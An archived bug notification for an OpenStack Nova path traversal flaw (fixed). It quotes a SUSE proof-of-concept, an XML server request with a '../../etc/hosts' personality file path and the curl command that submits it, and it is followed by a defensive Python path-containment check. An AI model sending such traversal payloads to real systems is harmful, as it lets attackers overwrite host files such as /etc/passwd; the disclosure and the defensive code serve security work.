yahoo-eng-team team mailing list archive

[Bug 1015531] Re: Remote arbitrary file corruption / creation flaw via injected files

 

** No longer affects: nova/diablo

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1015531

Title:
  Remote arbitrary file corruption / creation flaw via injected files

Status in OpenStack Compute (Nova):
  Fix Released
Status in OpenStack Compute (nova) essex series:
  Fix Released
Status in “nova” package in Ubuntu:
  Fix Released
Status in “nova” source package in Precise:
  Fix Released

Bug description:
  Matthias Weckbecker from SUSE Security Team reported the following:

  ------------------
  During our internal security audit efforts at SUSE for openstack, I have found
  an issue in openstack-nova (compute).

  Quoting from [1]  (comment #1):

  Vulnerable code (quoted), /usr/lib64/python2.6/site-packages/nova/utils.py:
  [... snipped copy of utils.execute code ...]

  It's already doing lots of things correctly, like e.g. calling Popen with
  the first parameter being a list, still it is affected by traversal flaws.

  Testcase (also from [1], comment #0):

  mweckbecker@s3gfault:~$ cat newserver.xml
  <?xml version="1.0" encoding="UTF-8"?>
  <server xmlns="http://docs.openstack.org/compute/api/v1.1"
          imageRef="http://anonymi.arch.suse.de:8774/985b88ae99474d6d90501870499a063f/images/2d583dfb-000a-4332-9264-ed57ce186f1d"
          flavorRef="6"
          name="new-server-test">
    <metadata>
      <meta key="My Server Name">foobar</meta>
    </metadata>
    <personality>
      <file path="../../../../../../../../../../../../../etc/hosts">
          ICAgICAgDQoiQSBjbG91ZCBkb2VzIG5vdCBrbm93IHdoeSBp
          dCBtb3ZlcyBpbiBqdXN0IHN1Y2ggYSBkaXJlY3Rpb24gYW5k
          IGF0IHN1Y2ggYSBzcGVlZC4uLkl0IGZlZWxzIGFuIGltcHVs
          c2lvbi4uLnRoaXMgaXMgdGhlIHBsYWNlIHRvIGdvIG5vdy4g
          QnV0IHRoZSBza3kga25vd3MgdGhlIHJlYXNvbnMgYW5kIHRo
          ZSBwYXR0ZXJucyBiZWhpbmQgYWxsIGNsb3VkcywgYW5kIHlv
          dSB3aWxsIGtub3csIHRvbywgd2hlbiB5b3UgbGlmdCB5b3Vy
          c2VsZiBoaWdoIGVub3VnaCB0byBzZWUgYmV5b25kIGhvcml6
          b25zLiINCg0KLVJpY2hhcmQgQmFjaA==
      </file>
    </personality>
  </server>

  mweckbecker@s3gfault:~$ curl -v \
    "http://anonymi.arch.suse.de:8774/v2/985b88ae99474d6d90501870499a063f/servers" \
    -H"X-Auth-Token:ef7d5faf9d864c048afce0cf6a3a3c15" \
    -H"Content-type:application/xml" -H"Accept:application/xml" -d @newserver.xml

  Additional note: This beast is calling tee with sudo, potentially allowing
  attackers to even alter files such as /etc/passwd.

  [1] https://bugzilla.novell.com/show_bug.cgi?id=767687

  Thanks, Matthias

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1015531/+subscriptions
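
A containment check for the injected-file path in the report above, as an added example; it is not nova's code and not the fix that was released. The names join_within_root, classify and PathEscapeError are hypothetical, and a temporary directory stands in for the mounted guest image.

```python
import os
import tempfile


class PathEscapeError(ValueError):
    """A guest-supplied path resolved outside the mounted image root."""


def join_within_root(root, guest_path):
    """Map an untrusted guest path to a host path confined to root.

    guest_path is attacker-controlled (for example the path attribute of a
    personality <file> element). It is always treated as relative to root;
    ".." segments and symlinks are resolved before the containment check.
    """
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(
        os.path.join(root_real, guest_path.lstrip("/")))
    # commonpath compares whole components, so /mnt/img-evil is not
    # mistaken for a child of /mnt/img as a startswith() test would.
    if (candidate == root_real
            or os.path.commonpath([root_real, candidate]) != root_real):
        raise PathEscapeError("%r is not inside %r" % (guest_path, root))
    return candidate


def classify(root, guest_paths):
    """Return {guest_path: True if accepted, False if rejected}."""
    results = {}
    for path in guest_paths:
        try:
            join_within_root(root, path)
            results[path] = True
        except PathEscapeError:
            results[path] = False
    return results


if __name__ == "__main__":
    # Constructed layout: a temp dir stands in for the mounted guest image,
    # with one symlink inside it that points at a directory outside it.
    root, outside = tempfile.mkdtemp(), tempfile.mkdtemp()
    os.symlink(outside, os.path.join(root, "escape"))
    samples = ["etc/hosts", "/etc/hosts", "a/../b.txt",
               # path attribute taken from the testcase in the report
               "../../../../../../../../../../../../../etc/hosts",
               "escape/hosts", ""]
    for path, ok in classify(root, samples).items():
        print("%-52r %s" % (path, "accept" if ok else "REJECT"))
```

The check has to run in the same privileged context as the write, immediately before it, because a path validated earlier can be swapped for a symlink in between.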